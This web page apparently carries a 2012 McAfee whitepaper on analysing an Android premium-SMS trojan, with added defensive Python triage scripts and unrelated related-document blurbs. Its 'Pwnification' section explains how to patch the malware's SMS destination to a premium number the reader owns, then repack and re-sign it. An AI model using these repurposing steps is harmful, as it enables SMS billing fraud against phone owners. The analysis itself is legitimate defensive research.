Mobile application penetration testing is used to evaluate the security of native mobile apps developed for Android and iOS. It involves testing data security both at rest and in transit, as well as identifying vulnerabilities using automated tools and manual techniques. Penetration testing can locate flaws in code, systems, applications, databases, and APIs to harden apps and prevent hackers from exploiting vulnerabilities. The document provides a list of important mobile application penetration testing tools for Android and iOS.
Android is an open-source software stack that includes an operating system for mobile devices. It was developed by Google and the Open Handset Alliance and uses the Java programming language. Android apps can pose security threats such as malware, drive-by exploits, and vulnerabilities in the web browser. The Android security model uses sandboxes, permissions, and signatures to protect each app's data. Users can also take precautions like only installing apps from trusted sources, checking app permissions, and using antivirus software.
This document discusses the importance of mobile application security and penetration testing. It describes penetration testing as discovering vulnerabilities before attackers through vulnerability detection, comprehensive penetration attempts, and analysis/reporting. The document outlines static and dynamic analysis methods used for Android application security assessments. These include code review, function hooking, runtime debugging, and analyzing data at rest and in transit. It promotes understanding how applications work through reverse engineering, decompilation, and deobfuscation. The methodology uses tools like MARA, MobSF, Xposed, Frida, and BurpSuite.
Similar to I haz you and pwn your maal whitepaper (20)
How to Fix the Import Error in the Odoo 17Celine George
An import error occurs when a program fails to import a module or library, disrupting its execution. In languages like Python, this issue arises when the specified module cannot be found or accessed, hindering the program's functionality. Resolving import errors is crucial for maintaining smooth software operation and uninterrupted development processes.
How to Setup Warehouse & Location in Odoo 17 InventoryCeline George
In this slide, we'll explore how to set up warehouses and locations in Odoo 17 Inventory. This will help us manage our stock effectively, track inventory levels, and streamline warehouse operations.
A review of the growth of the Israel Genealogy Research Association Database Collection for the last 12 months. Our collection is now passed the 3 million mark and still growing. See which archives have contributed the most. See the different types of records we have, and which years have had records added. You can also see what we have for the future.
Strategies for Effective Upskilling is a presentation by Chinwendu Peace in a Your Skill Boost Masterclass organisation by the Excellence Foundation for South Sudan on 08th and 09th June 2024 from 1 PM to 3 PM on each day.
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...PECB
Denis is a dynamic and results-driven Chief Information Officer (CIO) with a distinguished career spanning information systems analysis and technical project management. With a proven track record of spearheading the design and delivery of cutting-edge Information Management solutions, he has consistently elevated business operations, streamlined reporting functions, and maximized process efficiency.
Certified as an ISO/IEC 27001: Information Security Management Systems (ISMS) Lead Implementer, Data Protection Officer, and Cyber Risks Analyst, Denis brings a heightened focus on data security, privacy, and cyber resilience to every endeavor.
His expertise extends across a diverse spectrum of reporting, database, and web development applications, underpinned by an exceptional grasp of data storage and virtualization technologies. His proficiency in application testing, database administration, and data cleansing ensures seamless execution of complex projects.
What sets Denis apart is his comprehensive understanding of Business and Systems Analysis technologies, honed through involvement in all phases of the Software Development Lifecycle (SDLC). From meticulous requirements gathering to precise analysis, innovative design, rigorous development, thorough testing, and successful implementation, he has consistently delivered exceptional results.
Throughout his career, he has taken on multifaceted roles, from leading technical project management teams to owning solutions that drive operational excellence. His conscientious and proactive approach is unwavering, whether he is working independently or collaboratively within a team. His ability to connect with colleagues on a personal level underscores his commitment to fostering a harmonious and productive workplace environment.
Date: May 29, 2024
Tags: Information Security, ISO/IEC 27001, ISO/IEC 42001, Artificial Intelligence, GDPR
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: ISO/IEC 27001 Information Security Management System - EN | PECB
ISO/IEC 42001 Artificial Intelligence Management System - EN | PECB
General Data Protection Regulation (GDPR) - Training Courses - EN | PECB
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
How to Build a Module in Odoo 17 Using the Scaffold MethodCeline George
Odoo provides an option for creating a module by using a single line command. By using this command the user can make a whole structure of a module. It is very easy for a beginner to make a module. There is no need to make each file manually. This slide will show how to create a module using the scaffold method.
This presentation includes basic of PCOS their pathology and treatment and also Ayurveda correlation of PCOS and Ayurvedic line of treatment mentioned in classics.
A workshop hosted by the South African Journal of Science aimed at postgraduate students and early career researchers with little or no experience in writing and publishing journal articles.
How to Add Chatter in the odoo 17 ERP ModuleCeline George
In Odoo, the chatter is like a chat tool that helps you work together on records. You can leave notes and track things, making it easier to talk with your team and partners. Inside chatter, all communication history, activity, and changes will be displayed.
Walmart Business+ and Spark Good for Nonprofits.pdfTechSoup
"Learn about all the ways Walmart supports nonprofit organizations.
You will hear from Liz Willett, the Head of Nonprofits, and hear about what Walmart is doing to help nonprofits, including Walmart Business and Spark Good. Walmart Business+ is a new offer for nonprofits that offers discounts and also streamlines nonprofits order and expense tracking, saving time and money.
The webinar may also give some examples on how nonprofits can best leverage Walmart Business+.
The event will cover the following::
Walmart Business + (https://business.walmart.com/plus) is a new shopping experience for nonprofits, schools, and local business customers that connects an exclusive online shopping experience to stores. Benefits include free delivery and shipping, a 'Spend Analytics” feature, special discounts, deals and tax-exempt shopping.
Special TechSoup offer for a free 180 days membership, and up to $150 in discounts on eligible orders.
Spark Good (walmart.com/sparkgood) is a charitable platform that enables nonprofits to receive donations directly from customers and associates.
Answers about how you can do more with Walmart!"
This presentation was provided by Steph Pollock of The American Psychological Association’s Journals Program, and Damita Snow, of The American Society of Civil Engineers (ASCE), for the initial session of NISO's 2024 Training Series "DEIA in the Scholarly Landscape." Session One: 'Setting Expectations: a DEIA Primer,' was held June 6, 2024.
বাংলাদেশের অর্থনৈতিক সমীক্ষা ২০২৪ [Bangladesh Economic Review 2024 Bangla.pdf] কম্পিউটার , ট্যাব ও স্মার্ট ফোন ভার্সন সহ সম্পূর্ণ বাংলা ই-বুক বা pdf বই " সুচিপত্র ...বুকমার্ক মেনু 🔖 ও হাইপার লিংক মেনু 📝👆 যুক্ত ..
আমাদের সবার জন্য খুব খুব গুরুত্বপূর্ণ একটি বই ..বিসিএস, ব্যাংক, ইউনিভার্সিটি ভর্তি ও যে কোন প্রতিযোগিতা মূলক পরীক্ষার জন্য এর খুব ইম্পরট্যান্ট একটি বিষয় ...তাছাড়া বাংলাদেশের সাম্প্রতিক যে কোন ডাটা বা তথ্য এই বইতে পাবেন ...
তাই একজন নাগরিক হিসাবে এই তথ্য গুলো আপনার জানা প্রয়োজন ...।
বিসিএস ও ব্যাংক এর লিখিত পরীক্ষা ...+এছাড়া মাধ্যমিক ও উচ্চমাধ্যমিকের স্টুডেন্টদের জন্য অনেক কাজে আসবে ...
বাংলাদেশ অর্থনৈতিক সমীক্ষা (Economic Review) ২০২৪ UJS App.pdf
I haz you and pwn your maal whitepaper
I haz you and pwn your maal
(Taking control of an Android phone and its installed malware)
By Harsimran Walia
Research Scientist, McAfee Labs
2012
Abstract
The paper covers the evolution of malware that attacks the Android operating system and discusses the different types of malware infections. I shall look at the lab setup, the tools required, and the steps for reverse-engineering Android application package (APK) files to do the malware analysis. I’ll unpack the APK and decompile the Dalvik (Android OS) executable to Java code. I’ll cover the basic reversing of the Java code and patching and modifying it, examine how I can compile the code, and pack it back into an APK. I’ll also discuss how Android malware analysis is different from Windows malware analysis.
The presentation includes a live demo of a malware sample. Now to tie this talk to its title: While reversing the malware, I learned to which premium phone number the infected phone sends an SMS—thus I “have you” (your number). And by reversing the malware and changing the SMS number to my own number, I “own” the malware.
About the Author
Harsimran Walia is a research scientist at McAfee Labs. He graduated with a degree in mechanical engineering from the Indian Institute of Technology, Delhi. Walia presented his research at NullCon2011 on the topic "Reversing Microsoft patches to reveal vulnerable code." He is the author of various technical blogs and research papers.
Introduction
The increasing use of smartphones, tablets, and other mobile devices means that we no longer need to stay in one place to access data from our computers or the Internet. We can get lots of information on the go. However, these relatively new technologies create a larger attack surface. Our current mobility is a treasure trove for attackers because mobile security is not as mature as desktop and network protection.
The ease of attack and the vast amount of information on smartphones make them hot targets for attackers and data thieves. The most reliable way of attacking any system is via malware, which can penetrate a host, extract information, stay hidden, and send data to the attacker. Using the same method, attackers have created smartphone malware, which is delivered in the form of smartphone applications.
Although there are many smartphone platforms—including Apple’s iOS, Android, Symbian, and Blackberry—Android is by far the most popular with attackers. Why? Let’s start with Android’s leading market share.
Figure 1: Market share of Android OS smartphones, through February 2012.
Figure 2: Market share of Android OS smartphone sales over a period of 1 year.
As we can see, more than 50 percent of smartphone customers use Android OS–based phones. Also, 61 percent of smartphone sales in the first quarter of 2012 were Android OS based; Android has been the top seller for the past year. Looking at these stats, attackers have no trouble choosing Android as the target for their malware.
Market share is one big factor. Now let’s look at another: the development procedure for Android and iOS.
iOS                                    Android
Macintosh computer/laptop required     Any development platform will do (Windows, Linux, Mac, etc.)
Sign in to developer program           Android is open source; anyone can download the SDK
Wait for verification                  No validation required to put an app on the market
The differences in development have led to headlines such as these:
• Android OS the “worst platform for malware”— TG Daily, August 2011
• Android threats leapt 76% during Q2-2011—McAfee
• Most attacked mobile OS overtaking Symbian OS
• The most popular target for mobile malware developers
• Increasing target for cybercriminals
Android Malware
Android Malware Analysis
For the same reason as the malware developers, I chose the Android platform for my mobile malware analysis. Just as for Windows malware, we have two types of analysis for Android.
• Static. Reverse-engineer the application/malware using tools and techniques to recreate the actual code and algorithm.
• Dynamic. Check the behavior of the application/malware as it is executed on the system. Examine the network and system logs as the malware runs.
I will cover the following important procedures of Android malware analysis:
• Lab setup, including a virtual machine with an Android SDK installation
• Tools required for the analysis
• Static analysis. Extracting and decompiling the malware to understand the code
• Dynamic analysis. Understanding the behavior of the malware and its network activity
• Patching the malware to own it and repacking it into a full-blown Android app (.apk)
Types of Android Malware
During any analysis phase we figure out the behavior of the malware and identify its type. Let’s look at the different effects of malware versus the number of samples of each type.
Figure 3: Malware count and their effects.
Based on the different behaviors exhibited by malware samples we have analyzed, Android malware can be classified into the following types:
• Mobile Device Data Stealers. The most common type of malware found in the wild. The sole aim is to acquire information from the infected device, including:
– OS version
– Product ID
– International Mobile Equipment Identity (IMEI) number
– International Mobile Subscriber Identity (IMSI) number
The stolen device data may or may not be encrypted before it is sent via HTTP POST to the attacker. This information can be used for future attacks against the victim or against others, with the attacker impersonating the victim.
• Rooting Capable. This type of malware gains root privileges, which enables the attacker to do lots of interesting things that a normal user cannot do. Rooting provides remote access to files and the device’s flash memory. With rooting, malware can drop copies of itself onto flash memory without being detected or subsequently deleted by antimalware products. The variety of things that an attacker can do is similar to the operations that root can perform on a Linux system.
• Premium Service Abusers. This malware takes advantage of the SMS manager in Android. Most carry one or more hardcoded premium phone numbers in their code. The malware uses the SMS manager to send messages to these premium numbers, which charge the victims for SMS services without their knowledge.
• Mobile Device Spies. These stay hidden and secretly monitor and steal information stored on the device. Some of this information includes:
– GPS location
– Text and email messages
Like data stealers, spies send the stolen data to specific URLs via HTTP POST. The information may be used for targeted attacks or just for spying. The focus of this type of malware is to steal personal data.
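As an added example (not code from the paper), the following Python script applies the static-analysis step from the outline above to the indicators that characterize data stealers and premium service abusers: it reads the permissions from AndroidManifest.xml and scans the Java source recovered from the APK (for instance with dex2jar and JD-GUI) for identifier lookups, HTTP POST, SMS-manager calls, and hardcoded numbers. The function names, heuristics, and the embedded manifest and Java samples are constructed for this example.

```python
"""Added example: static triage of a decompiled APK against the malware
types described above. Inputs are the AndroidManifest.xml and the Java
source recovered with dex2jar/JD-GUI; all names, thresholds and the
sample inputs below are this example's own assumptions."""
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Decompiled calls that betray each behaviour the paper describes.
IDENTIFIER_APIS = {"getDeviceId": "IMEI", "getSubscriberId": "IMSI",
                   "getLine1Number": "phone number"}
NETWORK_APIS = ("HttpPost", "openConnection")
SMS_APIS = ("sendTextMessage", "sendMultipartTextMessage")


def manifest_permissions(manifest_xml):
    """Set of permission names requested in AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    return {node.get(ANDROID_NS + "name")
            for node in root.iter("uses-permission")}


def api_indicators(java_src):
    """Which suspicious API families appear in the decompiled source."""
    return {
        "identifiers": sorted(label for api, label in IDENTIFIER_APIS.items()
                              if api in java_src),
        "network": any(api in java_src for api in NETWORK_APIS),
        "sms": any(api in java_src for api in SMS_APIS),
    }


def hardcoded_numbers(java_src):
    """String literals that look like dialable numbers or SMS short codes."""
    return sorted(set(re.findall(r'"(\+?\d{4,15})"', java_src)))


def classify(manifest_xml, java_src):
    """Heuristic mapping of the indicators onto the paper's categories.

    A permission alone is not enough: the matching API use must also be
    present, which cuts down on false positives from legitimate apps.
    """
    perms = manifest_permissions(manifest_xml)
    ind = api_indicators(java_src)
    labels = []
    if (ind["identifiers"] and ind["network"]
            and "android.permission.INTERNET" in perms):
        labels.append("data stealer")
    if (ind["sms"] and hardcoded_numbers(java_src)
            and "android.permission.SEND_SMS" in perms):
        labels.append("premium service abuser")
    return labels


# Constructed sample inputs standing in for a real decompiled APK.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
</manifest>"""

SAMPLE_JAVA = """// Constructed stand-in for JD-GUI output; 7777 is a placeholder number.
public class Collector {
  void run(Context ctx) {
    TelephonyManager tm = (TelephonyManager) ctx.getSystemService("phone");
    String imei = tm.getDeviceId();
    String imsi = tm.getSubscriberId();
    HttpPost post = new HttpPost("http://example.invalid/upload");
    SmsManager.getDefault().sendTextMessage("7777", null, "GO", null, null);
  }
}"""

if __name__ == "__main__":
    print("permissions:", sorted(manifest_permissions(SAMPLE_MANIFEST)))
    print("indicators:", api_indicators(SAMPLE_JAVA))
    print("hardcoded numbers:", hardcoded_numbers(SAMPLE_JAVA))
    print("verdict:", classify(SAMPLE_MANIFEST, SAMPLE_JAVA))
```

The verdict for the constructed sample is both "data stealer" and "premium service abuser"; dropping SEND_SMS from the manifest leaves only the first label, which is the kind of cross-check between manifest and code that a triage pass should make.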
One-Click Billing Fraud
This technique delivers a specific type of malware. The operation of the technique on a computer is depicted in Figure 4.
Figure 4: The flow of one-click billing fraud.
This type of fraud is mostly active on porn and gamer video sites. An Android user would typically see a pop-up window on the screen as the user tries to view a video. The pop-up asks the user to download a (malicious) app to view the video. Upon installation, the malware gets the Android user’s account information and sends it to the cybercriminals. Using the stolen information to build credibility and to convince the victim to pay the amount, the malware displays a message such as “We haven’t received your payment. Therefore, based on our policy, we will have to charge you if you have not paid yet.” The pop-up appears every few minutes. As the victim keeps accepting, the malware eats his or her money.
Need
• Malware analysis is an important part of daily activities in antimalware companies and in others.
Mobile malware analysis has become equally important for these companies.
• Effective analysis can be used by law enforcement agencies to catch malware authors and attackers.
• For fun, when you can pwn someone else’s malware and control it. You get yourself full-blown
malware without writing it.
Practical Analysis Phase
Tools of the Trade
Here are several tools for both static and dynamic analysis.
Tools for static analysis
• Mobile Sandbox: Provides static analysis of malware images with an easily accessible web
interface for submission. http://www.mobile-sandbox.com (still in beta)
• IDA Pro: The most common tool among reverse engineers for disassembly and debugging; it
supports Android byte code from the professional Versions 6.1 and later.
http://www.hex-rays.com/products/ida/6.1/index.shtml
• APKInspector: A powerful GUI tool for analyzing Android applications.
http://code.google.com/p/apkinspector/
• Dex2jar: For converting Android’s .dex format to Java’s .class format.
http://code.google.com/p/dex2jar/
• JD-GUI: A standalone graphical utility that displays Java source code of .class files. You can
browse the reconstructed source code with the JD-GUI for instant access to methods and fields.
http://java.decompiler.free.fr/?q=jdgui
• Androguard: Reverse engineering and malware analysis of Android applications.
http://code.google.com/p/androguard/
• JAD: Java Decompiler. http://www.varaneckas.com/jad
• Dexdump: Java .dex file format decompiler. http://code.google.com/p/dex-decomplier/
• Smali: Smali/baksmali is an assembler/disassembler for the dex format used by Dalvik,
Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax,
and supports the functions of the dex format (annotations, debug info, line info, etc.).
http://code.google.com/p/smali/
Tools for dynamic analysis
• Droidbox: An Android application sandbox for dynamic analysis that uses “static precheck,
dynamic taint analysis and API monitoring. Data leaks can be detected by tainting sensitive data
and placing taint sinks throughout the API. Additionally, by logging relevant API function
parameters and return values, a potential malware can be discovered and reported for further
analysis.” http://www.honeynet.org/gsoc/slot5, http://code.google.com/p/droidbox/
• The Android SDK: “A software development kit that enables developers to create applications
for the Android platform. The Android SDK includes sample projects with source code,
development tools, an emulator, and required libraries to build Android applications.
Applications are written using the Java programming language and run on Dalvik, a custom
virtual machine designed for embedded use which runs on top of a Linux kernel.”
http://www.webopedia.com/TERM/A/Android_SDK.html
Using the Android SDK we can create a virtual Android device almost identical in functionality
and capabilities to an Android phone and use that virtual device as a secure environment in
which we can execute malware and observe its behavior.
Code: http://developer.android.com/sdk/index.html
• androidAuditTools: Dynamic Android analysis tools.
https://github.com/wuntee/androidAuditTools
Lab Setup
The traditional setup for malware analysis includes a virtual machine; we need one as well. We also
need to install the Android SDK in the machine. You can find details here:
http://developer.android.com/sdk/installing.html.
During the installation you will see a screen similar to this:
Figure 4: Choosing the version of the Android SDK API.
At this screen (Figure 4) you must select at least one version of the API. Different API versions are
required to develop applications for different Android versions (ICS, Gingerbread, etc.), and likewise
we need the matching SDK version for malware that targets a particular Android version. For my demo
I will use the Version 2.3 (Gingerbread) SDK.
Analysis
Let’s start by getting our hands on an Android malware. We can analyze it to study its behavior. At
Contagio Mini (http://contagiominidump.blogspot.in/) you can get lots of mobile malware. It is
community driven: Anyone can submit a sample, and it is made available to others.
I have Voodoo SimpleCarrierIQDetector, a malicious Android application that is supposed to detect the
presence of the Carrier IQ mobile diagnostic software on the system. We are going to dig deep inside to
analyze the application and try to find the malicious code. I chose this malware for ease of
understanding; we also see far more complex malware, for example samples that choose which SMS to
send based on the victim's country.
Static Analysis
Once we have the APK malware, we start by using an online sandbox analysis to get a brief idea about
this threat.
Mobile-sandbox.com: Submitting the APK file on mobile-sandbox.com for analysis generates the
following report, which we can view at http://mobilesandbox.org/xml_report_static/?q=176.
Sample SHA256: 79a3bc6da45243355a920082dc67da0febf19379c25c721c43fd6b3f83ff4ef4
Sample MD5: 69b9691a8274a17cdc22e9681b3e1c74
Start of Analysis: Feb. 12, 2012, 11:34 p.m.
End of Analysis: Feb. 12, 2012, 11:34 p.m.
apk Name: 69b9691a8274a17cdc22e9681b3e1c74.apk
Package Name: Détecteur de Carrier IQ
SDK Version: 7
Files inside the APK-package:
Used Features: android.hardware.telephony, android.hardware.touchscreen
Requested Permissions from Android Manifest: android.permission.READ_LOGS, android.permission.SEND_SMS
Used Permissions:
Responsible API calls for used Permissions:
Used Intents: android.intent.action.MAIN, android.intent.category.LAUNCHER
Used Activities:
Potentially dangerous Calls: sendSMS, Execution of native code, getPackageInfo
Used Services and Receiver:
Used Providers:
Used Networks:
URLs:
From the report we are mainly interested in the two fields marked in red: the malware requests
permissions to read the logs (READ_LOGS) and to send SMS (SEND_SMS), and the call made by the
application that the report flags as potentially dangerous is sendSMS.
Extraction: With this brief idea about the behavior and type of malware, we can start our manual
analysis. As a start, we need to extract the APK to get its contents. Since an APK is a zip archive,
WinRAR or WinZip will do.
On extraction we see the following files. The file of interest is classes.dex.
Figure 5: Files extracted from the malicious APK.
dex2jar: The next step is to use dex2jar at the command prompt with the following commands. It will
convert our classes.dex file to a jar file.
C:> dex2jar.bat classes.dex
Output: classes.dex -> classes_dex2jar.jar
JD-GUI: From the jar file, we want to be able to reach the code to proceed with our analysis. After
opening the jar file with JD-GUI, it looks like this.
Figure 6: Jar file opened with JD-GUI.
We see four .class files. Let’s analyze them one by one.
• Detect.class: Based on some checks, we see that the code is trying to work out whether the
CarrierIQ software is installed on the system.
• R.class: Every Android application contains this class file. Here it is used to declare a few
variables.
• Utils.class: Contains a few utility method definitions such as findFiles, getCommandOutput, etc.
• Main.class: This is the most interesting class because it contains the malicious code. The code
looks like this:
Figure 7: Malicious code highlighted by red boxes.
Code Analysis: The four highlighted lines of code are the same command, sending an SMS to the
number 81168 with four different SMS texts:
• AT37
• MC49
• SP99
• SP93
A Google search on that number tells us it is a premium-rate number that costs almost €9 per message.
This is how criminals make money with mobile malware. Some malware listens to incoming messages
and deletes them before victims can read them when the messages are from service providers
informing users about their balance or billing charges.
While searching on Google I found a related Facebook scam. The victim gets messages from friends on
Facebook asking him to vote for a friend on some “Miss and Mister” contest. Following the malicious
link hacks the Facebook account, rendering it unusable. The attacker then calls the victim and says the
account has been blocked for some reason. The victim must send an SMS to number 81168, with any of
the four texts, to receive a code, which has to be given to the caller (the attacker) to unlock the account.
I haz you
I “haz” you now because I know the premium-rate phone number and the text messages being sent. To
catch the crooks, this is the time to get the police involved. Find the country and the operator to whom
the number belongs and persuade that company to disclose information on the malware author.
Sometimes Google helps a lot; you can often find substantial public information.
Pwnification
Now it’s time for some fun by owning the malware and making it dance to our tune. The following
steps explain the process of owning this malware; you can generalize them to other malware.
Baksmali: We use this program to disassemble dex files. Using the following command to
disassemble classes.dex, we get .smali files, as shown in Figure 7.
C:> java -jar baksmali-0.93.jar -o smali-out classes.dex
Figure 7: Disassembling classes.dex presents us with several .smali files.
The .smali files, which can be opened in any text editor, have names similar to the .class files. Our
file with the malicious code is main$1.smali, which we figured out in the analysis phase. Opening the
file in a text editor shows us the malicious code:
Figure 8: Disassembled malicious code from main$1.smali.
Let’s change the destination number of the SMS. We find this in the first argument of the
sendTextMessage function call. Set this to your mobile number or any premium number that you own
to get yourself a malware. (But think of the consequence before using it for malicious intent. We
certainly don’t advise that you really do this.) I will change it to the port number of my Android
emulator, which I’ll use later for testing. Save the file.
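To locate the hardcoded destination and message texts without reading the smali by hand, here is an added example (not from the paper): it scans baksmali output for SmsManager.sendTextMessage calls and resolves the argument registers to the const-string values assigned to them. The smali excerpt is constructed to mirror main$1.smali, not the sample's real disassembly.

```python
import re

# Constructed smali modelled on the page's main$1.smali (not the real disassembly):
# four SmsManager.sendTextMessage calls to 81168 with the texts named in the analysis.
SAMPLE_SMALI = """\
.method public onClick(Landroid/view/View;)V
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v0
    const-string v1, "81168"
    const/4 v2, 0x0
    const-string v3, "AT37"
    invoke-virtual {v0, v1, v2, v3, v2, v2}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    const-string v3, "MC49"
    invoke-virtual {v0, v1, v2, v3, v2, v2}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    const-string v3, "SP99"
    invoke-virtual {v0, v1, v2, v3, v2, v2}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    const-string v3, "SP93"
    invoke-virtual {v0, v1, v2, v3, v2, v2}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    return-void
.end method
"""

CONST_STRING = re.compile(r'^\s*const-string(?:/jumbo)?\s+(\w+),\s*"((?:[^"\\]|\\.)*)"')
SEND_SMS = re.compile(r'^\s*invoke-[\w/]+\s+\{([^}]*)\},\s*Landroid/telephony/SmsManager;->sendTextMessage\(')

def find_sms_calls(smali: str) -> list:
    """Return (destination, text) for each SmsManager.sendTextMessage call.
    A register is resolved to the last const-string assigned to it inside the
    current method; anything else (a runtime value) comes back as None."""
    regs, calls = {}, []
    for line in smali.splitlines():
        if line.lstrip().startswith('.method'):
            regs = {}  # register contents do not carry over between methods
            continue
        m = CONST_STRING.match(line)
        if m:
            regs[m.group(1)] = m.group(2)
            continue
        m = SEND_SMS.match(line)
        if m:  # args: this, destinationAddress, scAddress, text, sentIntent, deliveryIntent
            a = [s.strip() for s in m.group(1).split(',')]  # /range form "v0 .. v5" not expanded
            calls.append((regs.get(a[1]) if len(a) > 1 else None,
                          regs.get(a[3]) if len(a) > 3 else None))
    return calls

if __name__ == '__main__':
    print(find_sms_calls(SAMPLE_SMALI))  # [('81168', 'AT37'), ('81168', 'MC49'), ('81168', 'SP99'), ('81168', 'SP93')]
```

Run over a real smali-out directory, any call whose destination resolves to a short-code string is a candidate premium-SMS sink worth checking against the permissions in the sandbox report.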
Smali: Now we compile the .smali files into a .dex file. After making the desired changes to the smali
file and saving it, we compile all the .smali files together to classes.dex using the following command.
C:> java -jar smali-0.93.jar smali-out -o classes.dex
Packing: With the modified classes.dex, we pack the files back into a .zip file using any packer utility.
After packing, we rename it to .apk and voila: we are done with the modification process and we own
some malware.
Signing: Google has made it mandatory for an application (APK) to be signed with the owner’s/author’s
private key; the system will not install an unsigned application on an emulator or a device. We can
use self-signed certificates to sign applications. No certificate authority is needed.
In order to sign the application you need:
• Keytool – Comes as part of the JDK installation. Used to create your private key for signing.
The following command generates a keystore named my-personal-key.keystore containing a key
under the alias alias_name:
C:> keytool -genkey -v -keystore my-personal-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Upon executing the above command it prompts you to provide passwords for the keystore and
key, and to fill in the Distinguished Name fields.
• Jarsigner – Also comes as part of the JDK installation. Used to sign the APK with the created
keystore. The following command signs the modified APK with the key from that keystore:
C:> jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-personal-key.keystore carrieriq.apk alias_name
Running the above command, jarsigner prompts you to provide passwords for the keystore and
key. It then modifies the APK in place, creating the META-INF folder with the signing details,
meaning the APK is now signed.
To verify that the APK is signed, use
C:> jarsigner -verify -verbose carrieriq.apk alias_name
If signed properly, it outputs “JAR verified”.
That’s it. Voila, you are done with the whole modification process and have your own malware.
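As an added illustration (not from the paper) of what the META-INF signing data covers and why a repacked APK must be re-signed: this script models the per-entry SHA1-Digest table that jarsigner writes to MANIFEST.MF, then checks a package against it, so a classes.dex swapped in after signing shows up as a mismatch. It does not verify the .SF/.RSA signature block itself, and the APK contents are constructed stand-ins.

```python
import base64, hashlib, io, zipfile

FILES = {'AndroidManifest.xml': b'<manifest/>', 'classes.dex': b'dex\n035\x00original'}  # constructed stand-ins

def build_manifest(files: dict) -> bytes:
    """Model the per-entry SHA1-Digest table jarsigner writes to META-INF/MANIFEST.MF (no .SF/.RSA)."""
    out = ['Manifest-Version: 1.0', '']
    for name, data in sorted(files.items()):
        digest = base64.b64encode(hashlib.sha1(data).digest()).decode()
        out += [f'Name: {name}', f'SHA1-Digest: {digest}', '']
    return '\r\n'.join(out).encode()

def pack(files: dict, manifest: bytes) -> bytes:
    """Zip the entries plus META-INF/MANIFEST.MF: the page's 'pack and rename to .apk' step."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as z:
        z.writestr('META-INF/MANIFEST.MF', manifest)
        for name, data in files.items():
            z.writestr(name, data)
    return buf.getvalue()

def parse_manifest(manifest: bytes) -> dict:
    """Map entry name -> recorded SHA1 digest from a MANIFEST.MF."""
    digests, name = {}, None
    for line in manifest.decode().splitlines():
        if line.startswith('Name: '):
            name = line[6:]
        elif line.startswith('SHA1-Digest: ') and name:
            digests[name] = line[13:]
    return digests

def verify_digests(apk: bytes) -> list:
    """Entries whose content differs from the signed digest (modified) or that have none (added after signing)."""
    bad = []
    with zipfile.ZipFile(io.BytesIO(apk)) as z:
        recorded = parse_manifest(z.read('META-INF/MANIFEST.MF'))
        for name in z.namelist():
            if name.startswith('META-INF/') or name.endswith('/'):
                continue  # the signature files are covered by the .SF block, not by the manifest
            actual = base64.b64encode(hashlib.sha1(z.read(name)).digest()).decode()
            if recorded.get(name) != actual:
                bad.append(name)
    return sorted(bad)

def demo() -> tuple:
    """Verify the signed build, then a repack with a patched classes.dex under the old manifest."""
    manifest = build_manifest(FILES)
    clean = pack(FILES, manifest)
    repacked = pack({**FILES, 'classes.dex': b'dex\n035\x00patched'}, manifest)
    return verify_digests(clean), verify_digests(repacked)  # ([], ['classes.dex'])
```

The same digest comparison is a quick triage check for repackaged apps: a mismatch between the manifest and the entries means the package was altered after it was signed.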
Playing
Dynamic Analysis
Let’s have a little bit of fun by installing our new Android (malware) application in the Android SDK
emulator and checking whether it really performs the functions that we intended. We open two instances
of the Android emulator and install the new malware on one of them, remembering that the SMS
destination is now the port number of the other emulator rather than the number the malware
originally carried.
Upon installation and running the app, as soon as the uninstall button is clicked the SMS messages are
sent to the other emulator. As seen in the figure, we receive all four SMS messages in the other
emulator, as expected from our analysis.
I pwn your maal
I have modified your malware, customized it to my needs, and now I pwn you maal. From now on it’s
going to serve me.
Conclusion
This paper is an overview of how the Android smartphone OS has, in a short time, become the most
popular target for cybercriminals. The article describes the different types of malware created for the
Android platform. By analyzing Android malware, the paper attempts to explain the lab setup, tools
required, and static and dynamic malware analysis by practically analyzing a real premium-rate SMS-
sending malware. Our analysis shows us the origin of the malware and how we can own it. In short, “I
haz you and pwn your maal.”